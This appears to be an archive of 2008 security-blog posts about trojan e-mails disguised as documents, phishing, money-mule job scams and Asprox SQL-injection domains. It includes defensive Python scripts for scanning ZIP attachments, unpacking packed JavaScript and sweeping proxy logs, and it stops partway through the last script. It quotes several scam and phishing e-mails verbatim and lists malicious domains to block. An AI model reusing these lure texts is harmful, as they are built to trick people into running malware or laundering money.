This is one good reason why you should not hide extensions for known file types on your PC (in Explorer: Folder Options, View, untick "Hide extensions for known file types"). The icon on the left looks like it has a .DOC extension, but only because the real .EXE extension has been hidden; it is revealed on the right.

VirusTotal indicates patchy detection rates including TrojanSpy:Win32/Zbot.gen!C, Trojan.Win32.FraudPack.gle, Trojan-Spy:W32/Zbot.VM, W32/Trojan3.DU, TROJ_FAKEALE.AI plus some generic heuristic detections.

In this case, the ZIP is called WorldPay_CARD_Transaction_Confirmation_OrderNo76644.doc.zip and the EXE is WorldPay_CARD_Transaction_Confirmation_OrderNo76644.doc.exe, but these names may be randomly generated from one message to the next.




Subject: WorldPay CARD transaction Confirmation
From: "Jana Rivera"

Thank you!Your transaction has been processed by WorldPay, on behalf ofAcademic
Resources Center Inc.
The invoice file is attached to this message.
This is not a tax receipt.
We processed your payment.
Academic Resources Center Inc has received your order,
and will inform you about delivery.
Sincerely,
The AcaDemon TeamEnquiries This confirmation only indicates that your transaction
has been processed successfully. It does not indicate that your order has been
accepted. It is the responsibility of Academic Resources Center Inc to confirm that
your order has been accepted, and to deliver any goods or services you have ordered.

If you have any questions about your order, please email Academic Resources Center
Inc at:followup@acade66Smicresourcescenter.com, with the transaction details listed
above.Thank you for shopping with Academic Resources Center Inc.



UPDATE 24/4/09: There's a similar spam run happening again, details are here.

Wednesday, 22 October 2008

"Better Business Bureaus Account Support" trojan


We have seen quite a lot of variants of this particular trojan recently, mostly aimed at banks. This one passes itself off as some sort of digital certificate, but according to VirusTotal it is a trojan variously identified as TrojanDownloader:Win32/Suceret.gen!A, Win32.Stration, Trojan-Downloader.Win32.WebDown.10 and a number of other generic detections.




Subject: Better Business Bureaus, Attention: Don't leave mail in your mailbox.
From: "Better Business Bureaus Account Support"

Attention Better Business Bureaus Consumers!

We've enhanced web surfing process with new security measures to keep your online
data and personal information safer.
All registered and new BBB consumers must register new software and update contact
information until October 24, 2008.
Please read the following information carefully:

Register your BBB company certificate here>>>

As always, we appreciate your business. And thank you for working with us.

Sincerely, Ila Newell.
2008 Council of Better Business Bureaus


Tuesday, 21 October 2008

6700.cn browser hijack (bad), SUPERAntiSpyware (good)

I've just spent several days investigating a machine with a particularly nasty rootkit infection. Despite throwing several tools at it and rummaging around the hard disk, the rootkit remained. The most obvious sign was a browser hijack pointing at 6700.cn but there were dozens of malware components installed too.

The F-Secure online scanner and ComboFix removed quite a lot of the malware, but hats off to SUPERAntiSpyware which identified and removed the last, tricky part of the rootkit. I haven't come across this application before, but it is definitely worth a look and it has a free trial.

In retrospect, a lot of the rootkit is also plainly visible using Sysinternals Autoruns: the malware components tend to lack "Publisher" details and can be easily identified. You may well need to take the hard disk out and mount it in a USB enclosure on a second PC, but a word of caution: it is possible to infect the second PC too, so try to avoid using anything mission critical for the cleanup.

"Data request" trojan

Another EXE-in-ZIP-disguised-as-a-DOC trojan, similar to this one.

Subject: Data request
From: "Billy Roark"


Please find the document attached to this message. The report was issued today.
Requested account details have been altered successfully.

Thank you for contacting us.

Respectfully,
Billy
The attachment in this case is called Statement_January-October.zip and contains an executable named Statement_January-October.doc[44 spaces].exe. The blank spaces are designed to push the .exe part of the filename out of the visible column so that it is effectively invisible.

It is a different binary from yesterday's, with better detection rates. But the best cure for this is avoidance: block EXEs-in-ZIPs at the mail gateway.

Monday, 20 October 2008

"Report Jan-Oct." trojan


This fake email contains an EXE in a ZIP designed to look like a Word document (complete with authentic looking icon), in this case "Statement1-10.doc .exe" (there are 75 spaces in the filename that Blogger strips out).

Subject: [name] Report Jan-Oct.
From: "Clara Slaughter"

Dear Customer,

As you requested, we are sending you this report with details on your account
transactions made between 1/1/2008 and 10/1/2008.

At your service,
Clara
The attached ZIP file is called Statement1-10.zip. VirusTotal shows detection is poor with what look like generic detections only.

If your mail filter allows it, you should block EXEs in ZIP files. Postini allows this, and I guess other filtering services do too.
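Mail filters do this well, but it is easy to write the same check yourself. Here is an added example (my own code, not part of the original posts and not any particular filter's logic) that inspects a ZIP attachment for the tricks seen in the WorldPay, "Data request" and "Report Jan-Oct." samples above: a double extension, whitespace padding before the real .exe, and an executable whose name is innocent but whose contents start with the PE "MZ" header. The ZIPs it scans are built in memory with dummy payloads; the names copy the spam, the bytes are not malware, and the extension list is my assumption.

```python
"""Flag executables hidden inside ZIP e-mail attachments (added example)."""
import io
import zipfile

# Extensions Windows will run on double-click. Assumed list for a mail gateway.
EXEC_EXTENSIONS = {
    ".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".vbs", ".js", ".hta", ".cpl",
}
# Extensions the spam pretends to be.
DOCUMENT_EXTENSIONS = {".doc", ".xls", ".pdf", ".txt", ".jpg"}


def true_extension(name: str) -> str:
    """Extension Explorer actually uses: trailing spaces stripped, last dot wins.

    'Statement.doc       .exe' -> '.exe', 'Report.doc.exe' -> '.exe', 'readme' -> ''
    """
    base = name.rsplit("/", 1)[-1].rstrip()
    if "." not in base:
        return ""
    return "." + base.rsplit(".", 1)[-1].lower()


def is_disguised(name: str) -> bool:
    """True when the part before the real extension looks like a document name
    (inner .doc/.xls/...) or is padded with whitespace to hide the extension."""
    base = name.rsplit("/", 1)[-1]
    stem = base.rsplit(".", 1)[0] if "." in base else base
    padded = stem != stem.rstrip()
    return padded or true_extension(stem) in DOCUMENT_EXTENSIONS


def scan_zip(data: bytes) -> list:
    """Return [(member name, reason)] for every suspicious member of a ZIP."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            ext = true_extension(info.filename)
            with zf.open(info) as fh:
                head = fh.read(2)          # PE files start with 'MZ'
            if ext in EXEC_EXTENSIONS:
                reason = "executable extension " + ext
                if is_disguised(info.filename):
                    reason += " disguised as a document"
                findings.append((info.filename, reason))
            elif head == b"MZ":
                findings.append((info.filename, "PE header with non-executable extension"))
    return findings


def build_zip(members: dict) -> bytes:
    """Build an in-memory ZIP from {name: bytes}. Constructed test data only."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, payload in members.items():
            zf.writestr(name, payload)
    return buf.getvalue()


FAKE_PE = b"MZ" + b"\x00" * 62   # dummy PE-style header, not a real program

# Constructed samples: names follow the spam, contents are harmless dummies.
SAMPLE_WORLDPAY = build_zip(
    {"WorldPay_CARD_Transaction_Confirmation_OrderNo76644.doc.exe": FAKE_PE})
SAMPLE_STATEMENT = build_zip(
    {"Statement_January-October.doc" + " " * 44 + ".exe": FAKE_PE})
SAMPLE_RENAMED = build_zip({"invoice.pdf": FAKE_PE})
SAMPLE_CLEAN = build_zip({"minutes.doc": b"plain text, not a program"})

if __name__ == "__main__":
    for label, sample in [("worldpay", SAMPLE_WORLDPAY), ("statement", SAMPLE_STATEMENT),
                          ("renamed", SAMPLE_RENAMED), ("clean", SAMPLE_CLEAN)]:
        print(label, scan_zip(sample))
```

The header check matters as much as the name check: a gateway that only looks at extensions will pass an EXE renamed to .pdf, and one that only looks at the name before the last dot will be fooled by the whitespace padding.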

Thursday, 16 October 2008

"LV Electronics Inc." job offer scam

There are plenty of legitimate companies called "LV Electronics", but this job offer is not from one of them. In this case, the originating IP was 91.77.116.141 in Russia.




Subject: Job offer in the United States.

Greetings.

LV Electronics Inc. is searching for hardworking person, that will represent our
branch in local area.

The required country: UNITED STATES ONLY! (all states).

Prior experience is not necessary; entry level admin, customer service and good
people skills are all you need.
Perfect for anyone who wants to work from home and spend more time with their
family, or just make some extra money.
Be debt free fast making an additional $4,000-12,000 A MONTH!

WRITE US AND APPLY NOW: lvelectronicsinc@aol.com


Fake job offer: ias-jobs.org

One of a series of fake job offers that are doing the rounds, this time promoting a company called IAG ("Internet Auction Service"). It's most likely a money mule scam (i.e. money laundering), or package reshipping (handling stolen goods) or something similar. Avoid.



Subject: Current Vacancy at IAG

Internet Auction Service provides business support, retail distribution, franchise
operations,
direct sales, and a variety of auction as well as accounting and billing services.

We are currently recruiting for the positions of Virtual Office Assistants in the
United
Kingdom, part-time and full-time available. The positions focus on providing
administrative
assistance in online sales.

Part-time and full-time positions available:

Part-time: 3 hours per day during either one of these shifts:
9:00am-12:00pm 11:00am-2:00pm 12:00pm-3:00pm 2:00pm-5:00pm

Full Time: 6 hours per day during either one of these shifts:
9:00am-3:00pm 11:00am-5:00pm

Salary:

Part-time: 1,100GBP/month plus commission
Full-time: 2,200GBP/month plus commission

Professional Qualities:
- Customer focused decision maker
- Demonstrates a high level of personal accountability
- Thinks about the team first over personal agendas
- Learning adaptive
- Process driven

Basic Requirements for Virtual Office Assistant:
- Internet Access
- Microsoft Office
- Basic Accounting skills

If you are interested in this position please send us an email to
Jennifer.Edwards@ias-jobs.org
expressing your interest and we will forward you the detailed job description and
the agreement.

Best regards,
IAS Team



Unusually, the domain ias-jobs.org has been registered for these purposes. www.ias-jobs.org is hosted on 89.218.205.90 in Kazakhstan (again). Mail is handled by 12.192.82.225 in the US which is unusual. Nameservers are ns1.eurogolden.net (194.150.120.47) and ns2.eurogolden.net (62.157.74.89) which all tie into this scam. utl-jobs.com and korkdevelopers.com can also be tied into this.

As a general rule, you should always avoid job offers from companies that you cannot verify exist in real life.

Asprox: lang42.ru

Another Asprox SQL injection domain to block / check for is lang42.ru. The following domains have been active in the past 24 hours:
  • 53refer.ru
  • chk06.ru
  • driver95.ru
  • errghr.ru
  • lang42.ru
  • netcfg9.ru
  • sitevgb.ru
  • vrelel.ru
As I've said before, completely blocking access to .ru domains would not be a huge problem for most businesses. Most .ru sites are in Russian, and if you don't use Russian in your business then you can probably live without them.

Wednesday, 15 October 2008

Asprox: new domains

After being stable for some time, the Asprox SQL injection hacks are now redirecting through a new bunch of .ru domains.
  • 30area.ru
  • 4log-in.ru
  • 53refer.ru
  • chk06.ru
  • driver95.ru
  • errghr.ru
  • netcfg9.ru
  • sitevgb.ru
  • vrelel.ru
WHOIS details are:

domain: ERRGHR.RU
type: CORPORATE
nserver: ns2.errghr.ru. 68.6.180.109
nserver: ns3.errghr.ru. 68.12.194.192
nserver: ns1.errghr.ru. 199.126.149.144
state: REGISTERED, DELEGATED
person: Private Person
phone: +7 772 7727727
fax-no: +7 772 7727727
e-mail: retyi111@yahoo.com
registrar: NAUNET-REG-RIPN
created: 2008.10.09
paid-till: 2009.10.09
source: TC-RIPN

retyi111@yahoo.com has been used before for these domains and various other nasties. As usual, block these domains and/or check your logs for them.

Tuesday, 14 October 2008

What the heck is Win32/Puloagem.B?

I've had a few CA-Vet alerts for Win32/Puloagem.B recently, with pretty sparse information on what Puloagem actually is. If you're being plagued with this, then it's worth knowing that this is basically just a variant of Zlob and it's a variety of fake anti-virus software. In our case, the executable was named winrar.exe.

VirusTotal has a good list of aliases, so if you're struggling with it then you can use some of the other names as references.

"Habitats Property and Service Inc." fake employement offer


Another bogus employment offer, this time from "Habitats Property and Service Inc". There appears to be no such firm, although there are plenty of legitimate companies with similar names who have nothing to do with this. It is most likely a money mule scam or package reshipping, or something similar. Avoid.

Subject: Real Estate company is looking for employees. You was selected.

JOB OFFER FROM: Habitats Property and Service Inc.

Big international company is urgently looking for permanent representatives within the whole territory of the United Kingdom. We need people at the age of 21 to 70 for rather easy work on processing of the incoming orders and performancing of simple management duties.

You don’t need to be a specialized professional or to have special training. We also do not require the working experience in this field; all you need for this job are:

* ability to accurately follow the instructions on the solving the required tasks
* be a confident computer user
* ability to work with MS Word
* ability to work with MS Excel
* have permanent Internet access

This job suits students, mothers, pensioners and people who are looking for the part-time job perfectly well. You need only 2-3 spare hours during the day to fulfill your working duties.

All the candidates will be checked and selected on the competitive basis. To submit your application, please, send us your resume/CV to the following address:

cv08.habitats@googlemail.com

Your request will be considered within 24-48 hours.

Originating IP in this case was 217.15.186.77 in Kazakhstan.

Friday, 10 October 2008

FTC: Bank Failures, Mergers and Takeovers: A "Phish-erman's Special"

A timely warning from the FTC on the threat of criminals using the worldwide financial crisis to obtain banking details.. although as seen recently the payload could also be a trojan rather than a phishing attempt.

The FTC say:
If the recent changes in the financial marketplace have you confused, you’re not alone. The financial institution where you did business last week may have a new name today, and your checks and statements may come with a new look tomorrow. A new lender may have acquired your mortgage, and you could be mailing your payments to a new servicer. Procedures for the banking you do online also may have changed. According to the Federal Trade Commission (FTC), the nation’s consumer protection agency, the upheaval in the financial marketplace may spur scam artists to phish for your personal information.
They then go on to offer some excellent tips and examples of what to look out for. As I said before, it's worth warning any end-users you support of this risk because it would be relatively trivial to come up with a scam that looks very convincing indeed, and including a reference to the FTC warning might get at least some of them taking the threat seriously.

Thursday, 9 October 2008

securityassurance@microsoft.com - "Security Update for OS Microsoft Windows"

A malicious EXE file is doing the rounds, pretending to be an update from Microsoft and including some social engineering such as a fake PGP signature. The payload is an executable called KB960312.exe. Detection rates are poor, but it's clearly some hideous piece of malware that you really don't want anywhere near your PC. For what it's worth: Microsoft never distributes security updates as email attachments, genuine updates are Authenticode-signed rather than PGP-signed, and the "signature" below isn't even valid PGP ASCII armour (radix-64 uses upper and lower case letters; this block is all capitals and digits).




Subject: Security Update for OS Microsoft Windows
From: "Microsoft Official Update Center"

Dear Microsoft Customer,

Please notice that Microsoft company has recently issued a Security Update for OS
Microsoft Windows. The update applies to the following OS versions: Microsoft
Windows 98, Microsoft Windows 2000, Microsoft Windows Millenium, Microsoft Windows
XP, Microsoft Windows Vista.

Please notice, that present update applies to high-priority updates category. In
order to help protect your computer against security threats and performance
problems, we strongly recommend you to install this update.

Since public distribution of this Update through the official website
http://www.microsoft.com would have result in efficient creation of a malicious
software, we made a decision to issue an experimental private version of an update
for all Microsoft Windows OS users.

As your computer is set to receive notifications when new updates are available, you
have received this notice.

In order to start the update, please follow the step-by-step instruction:
1. Run the file, that you have received along with this message.
2. Carefully follow all the instructions you see on the screen.

If nothing changes after you have run the file, probably in the settings of your OS
you have an indication to run all the updates at a background routine. In that case,
at this point the upgrade of your OS will be finished.

We apologize for any inconvenience this back order may be causing you.


Thank you,

Steve Lipner
Director of Security Assurance
Microsoft Corp.


-----BEGIN PGP SIGNATURE-----
Version: PGP 7.1

3L0SDPQYESHKTVB7P898LE266163YL9LZQ6AU3LYK9JFM85HDX4S5FG0PEUY5HXP0
31Q8WAOREI4H0A7OF4UDTOG8HAXPAZMV91DI6B8XJEQ0636ND3XAWTCOOSNLIGHUN
ZSDHKKLZ099I6Y03BO91DGUTQMMFT0CWMCZQ4G0R0EYMNN199IEG0PKA6CE3ZPAB6
EJ4UN52NIIB4VF78224S7BCNFH3NP9V91T66QV0RKA2KOG0RA0EUM5VY17P41G016
I2YU34EL9XJQGS7C5GMDU4FJUIC3M3ZIAU6==
-----END PGP SIGNATURE-----




Update: KB231660.exe has also been spotted with a different PGP signature, although securityassurance@microsoft.com remains the same. Also KB986008.exe, KB415282.exe, KB985274.exe, KB166277.exe .. probably a load more will be sent out over the next few hours.

Update 2: This has now been picked up by the folks at the ISC.

Citigroup/Wachovia "Security Certificates" trojan

These fake "security certificates" have been around for a while, but it has taken a little time for the Bad Guys to leverage the recent worldwide banking crisis. Expect to see a LOT more of these as more banks struggle or are taken over.

WACHOVIA CORPORATION NOTICE.

Citigroup announced a buyout of Wachovia brokered by the FDIC moments ago.
All Wachovia bank locations will be in the Citigroup merger to prevent failure of Wachovia.
The Citigroup/Wachovia would focus on upgrading banks' security certificates.
All Wachovia customers must fill the forms and complete installation of new Citigroup Standard digital signatures during 48 hours.
Please follow the installation steps below:

Read more here>>

Sincerely, Sophie Burkett.
2008 Wachovia Corporation.
All rights reserved.

The link goes to the insanely named domain commercial [dot] wachovia [dot] online [dot] financial [dot] service [dot] onlineupdate.iawyvy9gcv.bankonline.doexte.gbiexsse.com which is hosted on a fast-flux botnet. The target executable is InstallationPackWachovia.exe located in the root directory which triggers just a few heuristic scanners or generic detections according to VirusTotal.


If you work in IT in any kind of organisation, it is worth sending out a warning to end users to ensure that they are aware of these emails, either at work or at home. The current batch are not particularly credible, but the Bad Guys will probably keep working on their social engineering skills.

Fake "VM-Soft" job offer

VM-SOFT (www.vm-soft.com.ua) is a wholly legitimate Ukrainian software developer, whose corporate identity is being used by a third party to perpetrate an apparent Money Mule scam, in an approach almost identical to this earlier fake email for another Ukrainian company.

The email copies the name of the director, Viktor Marchenko, and even uses a very similar Gmail address (see the genuine contact page for the real one).


Hello Sir/Madam.


I Viktor Marchenko, I introduce VM-Soft specializes in innovative IT solutions and
complex software projects development.

My company based in Ukraine. We've earned ourselves a reputation of a reliable and
trustworthy partner working successfully with a number of West European companies
and providing them with reliable software development services in financial and
media sectors. Unfortunately we are currently facing some difficulties with
receiving payments for our services. It usually takes us 10-30 days to receive a
payment and clearing from your country and such delays are harmful to our business.
We do not have so much time to accept every wire transfer.


That's why we are currently looking for partners in your country to help us accept
and process these payments faster. If you are looking for a chance to make an
additional profit you can become our representative in your country. As our
representative you will receive 8% of every deal we conduct. Your job will be
accepting funds in the form of wire transfers and forwarding them to us. It is not a
full-time job, but rather a very convenient and fast way to receive additional
income. We also consider opening an office in your country in the nearest future and
you will then have certain privileges should you decide to apply for a full-time
job. Please if you are interested in transacting business with us we will be very
glad.


Please contact me for more information via email: offer.job.vmsoft.ua@gmail.com

and send us the following information about yourself:

Your Full Name as it appears on your resume.
Education.
Your Contact Address.
Telephone/Fax number.
Your present Occupation and Position currently held.
Your Age

Please respond and we will provide you with additional details on how you can become
our representative. Joining us and starting business today will cost you nothing and
you will be able to earn a bit of extra money fast and easy. Should you have any
questions, please feel free to contact us with all your questions.

Sincerely,
Viktor Marchenko ,
VM-Soft



If you're not familiar with this type of scam, then basically it amounts to laundering stolen money.

One important tip usually is that legitimate companies tend not to use free email addresses, but in this case the genuine VM-SOFT does, instead of using its own vm-soft.com.ua domain which is not so helpful.

Increasingly, the scammers use names of genuine companies and even genuine directors. They may register domain names that look confusingly similar to the real thing, so sometimes the only concrete thing that you have to go on is common sense: if it looks too good to be true, then it probably isn't true.

Dating scams, onlineflh.com and 79.135.167.*

I have covered this particular group of dating scam sites before, but this time there's a slight shift in the way that it works. In this case, the parenthesis-laden email looks something like:

hey^) how are you?) do you have a girlfriend?)... i have not boyfriend(( I very
want to meet real men...which will know woman's need ...like in a cinema ... you
know))))lets chat!) i am pretty girl)) I have a lot of time for meetings and if you
have any ideas how to spend it with me... just email me back at
CAROLINE@onlineflh.com and i will reply back with some nice ;) photos with me
...and maybe, you will want to write me again))) CAROLINE@onlineflh.com

Perhaps "Caroline" is trying to date a LISP programmer? There's no website for onlineflh.com, but mail is handled by 79.135.167.51, which is the same server as before.. although now the only two websites on it are Ammae.com and Amnocx.com.

In these circumstances, a tool like Robtex can be useful. It turns out that 79.135.167.51 is an infrastructure server for a number of domains. The IP address is noted as belonging to a ROKSO-listed spammer, most likely some affiliate of the Russian Business Network (RBN).

Supported domains are:
  • alllam.com
  • cardrealc.com
  • ezshl.com
  • famplayfit.cn
  • firstlam.com
  • flasheon.com
  • gosfordw.com
  • llcam.com
  • morerd.com
  • onlineflh.com
  • onlineshl.com
  • planetflh.com
  • rdplanet.com
  • towadapointhalf.cn
  • virtuellmal.com
The whole 79.135.167.* block is a complete sewer of fake antivirus, dating, medication and codec sites. The netblock is registered to "TTNet Autonomous System Turk Telekom A S Aydinlikevler ANKARA 06103 TURKEY", but most likely under the control of the RBN. There's an interesting writeup about this netblock here.

The Spamhaus DROP list goes further and lists the entire 79.135.160.0/19 block (79.135.160.0 - 79.135.191.255) as being rogue. That's probably overkill as there do seem to be some legitimate (mostly Turkish) websites hosted in that range.

These were more fun when they had a picture of a pretty girl attached.

Monday, 6 October 2008

Asprox: deryv.ru still active

The Asprox botnet is still active but has been remarkably stable, with no new domains in the past week and 88% of the traffic going to deryv.ru.

  • ctiry.ru (3%)
  • deryv.ru (88%)
  • mentoe.ru (4%)
  • mheop.ru (3%)
  • pormce.ru (2%)

Consistently, the malware code is packed with eval(function(p,a,c,k,e,d) (the signature of the Dean Edwards JavaScript packer; it is obfuscation, not encryption), presumably to avoid detection by anti-virus software. So, if you only check your logs for / block ONE Asprox domain, then deryv.ru seems to be the one to look at.

Monday, 29 September 2008

Nokia's first touchscreen phone....?

There are plenty of rumours that Nokia will announce their "first" touchscreen phone sometime this week.. except that it won't be their first touchscreen phone. Here's a look at previous Nokia touchscreen devices which have mostly been forgotten.

Asprox: ctiry.ru, deryv.ru, mentoe.ru, mheop.ru, pormce.ru and xenbv.ru

Another bunch of Asprox domains that have been active over the past few days are listed below. As usual, block these or check your logs for activity.

  • ctiry.ru
  • deryv.ru
  • mentoe.ru
  • mheop.ru
  • pormce.ru
  • xenbv.ru

Thursday, 25 September 2008

Asprox: "eval(function(p,a,c,k,e,r)"

There has been a slight shift in tactics by the Asprox gang in their SQL injection attacks in that they are now using a packer on their JavaScript. This doesn't seem to be for obfuscation reasons, as the script is relatively easy to decode. Presumably it's a way to get around virus and link scanners. (Click the image below for an example.)

You can decode it easily enough by adding eval=alert; to the start of the script so that the unpacked code is displayed rather than executed (follow the instructions here), but never mess around with malware scripts on a vulnerable production system, because it is very easy to get infected.

mnicbre.ru and vtg43.ru seem to be two active domains, although perhaps check for all the ones on this list to be safe.

Packing tools are an easy way to avoid detection.. at least temporarily. But given the prevalence of JavaScript-based malware and the ever-increasing availability of bandwidth, JavaScript packing is becoming an increasingly bad practice. There have been a couple of high-profile cases where a packing tool has effectively been blacklisted by anti-virus products (here and here), so if you use JavaScript extensively and rely on a packing tool, you might want to reconsider how you deploy JavaScript on your site.
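As an added example (my own code, not from the original post and nothing to do with Asprox's own scripts), the substitution that the packer's eval() performs at run time can be done statically in Python, so the script is never executed at all; that is the safe alternative to the eval=alert trick on a live machine. The packer writes each keyword index into the body as a base-`a` symbol (digits, then a-z, then A-Z for radix 62) and a word-boundary replace maps the symbols back. SAMPLE_PACKED below is a packed script I constructed for the example (the standard packer wrapper around a harmless one-line body), not a capture from an Asprox site; the p,a,c,k,e,r spelling of the wrapper is also recognised.

```python
"""Statically unpack Dean Edwards "p,a,c,k,e,d" JavaScript (added example)."""
import re
import string

# Symbol alphabet the packer uses: 0-9, a-z, then A-Z for radix 62.
ALPHABET = string.digits + string.ascii_lowercase + string.ascii_uppercase

PACKER_SIGNATURE = re.compile(r"eval\(function\(p,a,c,k,e,[dr]\)")

# The four trailing arguments: p (packed body), a (radix), c (keyword count)
# and the '|'-separated keyword list. Both quoted strings may contain \' and \\.
ARGS_RE = re.compile(
    r"\}\s*\(\s*'((?:[^'\\]|\\.)*)'\s*,\s*(\d+)\s*,\s*(\d+)\s*,\s*"
    r"'((?:[^'\\]|\\.)*)'\s*\.split\('\|'\)",
    re.S,
)


def looks_packed(script: str) -> bool:
    """Cheap detection of the eval(function(p,a,c,k,e,d|r) signature."""
    return PACKER_SIGNATURE.search(script) is not None


def encode_index(n: int, radix: int) -> str:
    """The packer's e(): the symbol written into p for keyword index n."""
    if n == 0:
        return ALPHABET[0]
    out = ""
    while n:
        n, rem = divmod(n, radix)
        out = ALPHABET[rem] + out
    return out


def unpack(script: str) -> str:
    """Undo one layer of packing; ValueError if the layout is not recognised."""
    m = ARGS_RE.search(script)
    if m is None:
        raise ValueError("not a p,a,c,k,e,d packed script")
    body, radix, count = m.group(1), int(m.group(2)), int(m.group(3))
    keywords = m.group(4).split("|")
    body = re.sub(r"\\([\\'])", r"\1", body)      # the packer escapes ' and \ in p
    # symbol -> keyword; an empty keyword means "the token stands for itself"
    table = {encode_index(i, radix): kw
             for i, kw in enumerate(keywords[:count]) if kw}
    return re.sub(r"\b\w+\b", lambda tok: table.get(tok.group(0), tok.group(0)), body)


def unpack_all(script: str, max_layers: int = 5) -> str:
    """Peel nested layers of packing until the signature is gone."""
    for _ in range(max_layers):
        if not looks_packed(script):
            break
        script = unpack(script)
    return script


# Constructed sample: the stock packer wrapper around a harmless body.
SAMPLE_PACKED = (
    r"eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};"
    r"if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}"
    r"k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};"
    r"while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}"
    r"return p}('4 1=2.3;5(1.6>0){7.8(1)}',36,9,"
    r"'|host|location|hostname|var|if|length|document|write'.split('|'),0,{}))"
)

if __name__ == "__main__":
    print(unpack_all(SAMPLE_PACKED))
```

The regular-expression extraction is deliberately strict: anything that is not the stock wrapper (a hand-modified packer, a second obfuscation layer on top) raises rather than silently returning junk, which is the behaviour you want in a scanner.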

Wednesday, 24 September 2008

Asprox: h3x.info

Briefly popping up on the Asprox SQL Injection radar yesterday was h3x.info, specifically a call to h3x.info/index.php [dangerous site, do not visit].

h3x.info doesn't fit the normal pattern, perhaps it has been rotated in as a test. What's certain is that this is a malware distribution site.. and a pretty scary one at that.

Let's look at the domain details first of all. As you might expect, they're mostly bogus:

Domain ID
D23859712-LRMS
Domain Name
H3X.INFO
Created On
19-Feb-2008 22:04:56 UTC
Last Updated On
27-Aug-2008 12:38:06 UTC
Expiration Date
19-Feb-2009 22:04:56 UTC
Sponsoring Registrar
Registrar Company, INC (R315-LRMS)
Status
OK
Registrant ID
DI_7764637
Registrant Name
Alex
Registrant Organization
Vteam
Registrant Street1
vol. str. 221-122, 12
Registrant Street2

Registrant Street3

Registrant City
Novie
Registrant State/Province
Aveiro
Registrant Postal Code
19923
Registrant Country
PT
Registrant Phone
+12.56231321
Registrant Phone Ext.

Registrant FAX

Registrant FAX Ext.

Registrant Email
cy@bk.ru

[..snip..]

Name Server
ns1.mbhost.ru
Name Server
ns2.mbhost.ru
The domain itself is on 80.90.114.13 which appears to be a general purpose server belonging to Smartlogic Ltd in Moscow. There's no evidence to connect Smartlogic to this site, other than it belongs to a customer.. overall they seem to be a pretty clean outfit.

Visiting the top level of the h3x.info site (or the index.php page) reveals a very impressive bit of obfuscated scripting (a copy is here - h3x-info.zip - ZIP password is virus). There are some recognisable references to Outlook Express, Snapshot (probably MS08-041), Apple QuickTime (take your pick), plus an infected PDF (from hxxp:||h3x.info|cache|doc.pdf) variously identified as Exploit.HTML.Agent.AO [BitDefender] and Mal/JSShell-B [Sophos] (full VirusTotal report here) but otherwise detection rates are very poor.

Looking at the WHOIS history, it's quite possible that the h3x.info domain has been hijacked, so perhaps it will be cleaned up in the future. At the moment it does seem to be an interesting repository of malware if you're a researcher.

It was only active for a short while at about 1000 UTC (1100 BST, 1200 CET) on 23rd September before reverting to the same .ru domains that have been active for a few days.


Tuesday, 23 September 2008

T-Mobile G1

It's kind of hard to tell if the T-Mobile G1 is the next big thing or just some sort of damp squib. It may not look as impressive as the iPhone on the top, but underneath the G1's Android operating system looks promising.

Oddly enough, it got me thinking about how I use my own phone.. and I tend to use web access more than anything else, but make only a couple of phone calls on it a week; sometimes I will listen to music or snap a photograph. I think I tried video calling once. So perhaps this G1 thingie is actually more in line with what a lot of sad geeky people like me actually want.

Anyway, this comes out in October in the US, November in the UK and early next year for other T-Mobile customers. Some more pictures are here.

Thursday, 18 September 2008

Asprox: mnbenio.ru

mnbenio.ru is a new Asprox SQL injection domain that has been active in the past 24 hours, the following four domains are the most active:

  • mnbenio.ru
  • mnicbre.ru
  • pkseio.ru
  • vtg43.ru
It does seem that the SQL injection attacks are becoming less widespread, probably partly because SQL servers are being hardened, but some vulnerable SQL servers have remained untouched by the latest round of attacks. Possibly the SQL injection gangs are concentrating on bigger fish? Like the recent attack on BusinessWeek.com perhaps?

Wednesday, 17 September 2008

Asprox: mnicbre.ru, pkseio.ru and vtg43.ru

The domains used in the Asprox SQL injection attacks have been stable for a few days now, but yesterday some new .ru domains appeared: mnicbre.ru, pkseio.ru and vtg43.ru. The domains are registered through NAUNET again with the following registration details:

domain: MNICBRE.RU
type: CORPORATE
nserver: ns2.mnicbre.ru. 75.181.3.122
nserver: ns3.mnicbre.ru. 68.197.137.239
nserver: ns1.mnicbre.ru. 76.240.151.177
state: REGISTERED, DELEGATED
person: Private Person
phone: +7 772 7727091
fax-no: +7 772 7727091
e-mail: retyi1111@yahoo.com
registrar: NAUNET-REG-RIPN
created: 2008.09.16
paid-till: 2009.09.16
source: TC-RIPN
The following domains have been active over the past 24 hours. Block these or check your logs for them (mnicbre.ru, pkseio.ru and vtg43.ru are the new ones):
  • 22net.ru
  • 64asp.ru
  • 92prt.ru
  • acr34.ru
  • asl39.ru
  • fst9.ru
  • mnicbre.ru
  • pkseio.ru
  • sel92.ru
  • vtg43.ru
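To "check your logs" for the domains in the Asprox posts above, here is an added example (my own code, not the blog's own tooling) that sweeps a Squid-format proxy log for requests to any listed domain or a sub-domain of one. Matching is done on the hostname taken from the URL, so a different port, a deep path or a "cdn." prefix still counts, while a look-alike such as notlang42.ru does not. The four log lines are constructed for the example and the paths in them are made up.

```python
"""Sweep a Squid access.log for Asprox redirector domains (added example)."""
from urllib.parse import urlsplit

# Domains named in the Asprox posts on this page (17 Sept - 16 Oct 2008).
ASPROX_DOMAINS = {
    "22net.ru", "64asp.ru", "92prt.ru", "acr34.ru", "asl39.ru", "fst9.ru",
    "mnicbre.ru", "pkseio.ru", "sel92.ru", "vtg43.ru", "mnbenio.ru",
    "ctiry.ru", "deryv.ru", "mentoe.ru", "mheop.ru", "pormce.ru", "xenbv.ru",
    "30area.ru", "4log-in.ru", "53refer.ru", "chk06.ru", "driver95.ru",
    "errghr.ru", "netcfg9.ru", "sitevgb.ru", "vrelel.ru", "lang42.ru",
    "h3x.info",
}

# Constructed log lines in Squid's native layout:
# time elapsed client result/status bytes method URL ident hierarchy/peer type
SAMPLE_LOG = """\
1224144000.123    312 10.1.2.33 TCP_MISS/200 1834 GET http://www.example.com/index.html - DIRECT/192.0.2.10 text/html
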